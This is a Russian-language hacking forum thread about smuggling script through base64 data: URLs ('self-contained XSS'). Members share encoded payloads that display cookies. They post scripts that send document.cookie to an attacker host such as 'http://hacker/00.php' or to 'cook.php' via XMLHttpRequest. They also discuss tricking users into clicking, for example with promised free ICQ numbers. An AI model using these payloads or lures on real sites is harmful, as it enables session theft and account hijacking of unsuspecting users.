Самодостаточная XSS

[not null]

Совсем недавно была опубликована статья о новом типе XSS уязвимости - самодостаточная XSS.
Как известно, XSS - это такой класс атак, когда уязвимость обнаруживает себя при выводе какой либо информации, оставленной злонамеренным пользователем, жертве. Бывают они активные и пассивные. Однако они требуют наличия ошибок и неточностей в фильтрации данных, т.е. ошибок в скриптах. Новому классу ошибки в скриптах не нужны: он использует возможности самих браузеров. Это значит, что злонамеренному пользователю достаточно лишь сформировать специального вида урл.
Пример:

<script>alert("XSS")</script>

После строку нужно преобразовать. В ссылках есть генераторы, которые из вашего js делают ядовитый код. Таким образом, после преобразования, на выходе получим:
dataext/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4
Если перейти по этой ссылке (*), можно увидеть алерт с надписью XSS.
Кстати, работает эта фича (или уязвимость, даже не понятно, как ее правильно назвать) только в опере и в ФФ. Причем в ФФ даже лучше:

<script>alert(document.cookie)</script>

На выходе получаем:
dataext/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
В моей опере данная вещь не сработала. Зато в ФФ выдала куки как на блюдечке.
Самое интересное, что бедный ослик IE к этой уязвимости не чувствителен. Хотя, на фоне последних уязвимостей BoF, эта XSS покажется мелочью.
Ссылки по теме:
Первоисточник
Русский перевод
-----------------
Примечание
(*) Инвижен не позволяет сделать кликабельную ссылку из такой строки, так что если хотите провериться, скопируйте ее и вставьте в строку браузера.

 

[pro5to]

короче решил поюзать такой крест.
<script>
window.location.href='http://hacker/00.php?cookie='+document.cookie;
</script>
преобразовал ,а редиректа нет.
это через локатион , так же и через опен
прикол в том что и редиректа то нет.
а алерт вижу :lol:

 

[ammok]

Я об этой уязвимости читал на секлабе (вчера еще, я помню ), давольнатаки интересная уязвимость...

 

[-S3-]

not null
Проверил алерт с куками и мне выдало пустое окошко(юзаю FF),так разве должно быть? :blink:

 

[Great]

Проверил алерт с куками и мне выдало пустое окошко(юзаю FF),так разве должно быть? blink.gif

если ты ввел просто

data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

в новом окне - то да. там никаких кукисов нет и быть не может. (я про код alert(document.cookie); )

 

[ammok]

-S3-
Ты заюзай в этом окне ...

 

[-S3-]

Great
ammok
Действ. работает!Спасибо

 

[nerezus]

У меня не пашет.

А во вторых это все же уязвимость движка, который пропускает ссылки начинающиеся не с (?:http|ftp)s?

 

[ammok]

Этой заразой болеет DataLife, но уязвимость не самая простая, надо как-то заставить юзера нажать на эту ссылку...

 

[NoName]

Эээ.. можно попробывать в страницу вставить флеш с выполнением данного кода...

 

[k1b0rg]

или с помощью AJAX

 

[gemaglabin]

kiborg

<script>
var request = new XMLHttpRequest();
request.open("GET", "cook.php?c=" + document.cookie, false);
request.send("");
</script>


?

 

[pro5to]

Я об этой уязвимости читал на секлабе (вчера еще, я помню smile.gif), давольнатаки интересная уязвимость...

все в курсе :P

всё прекрасно работает.
просто я опять был не в форме :crazy: "ошибки были"

надо как-то заставить юзера нажать на эту ссылку...

ды таких петушков куча. им ток дай урл)) мол бесплатные 6ки "заюзав тэги форума """

 

[NoName]

Такс.. я уже писал на счет флеша, впрос в том как это вставить - явно не везде прокатит <_<
Грубый пример чтоб было понятно по ссылке ниже

Все что могло Вам навердить (думаю догадаетесь) я убрал

Просто как вариант и тема для размышлений <_<

Заходим по ссылке и смотрим что происходит
Ссылка временно не доступна идет тест !

p/s далеконе идиал - но...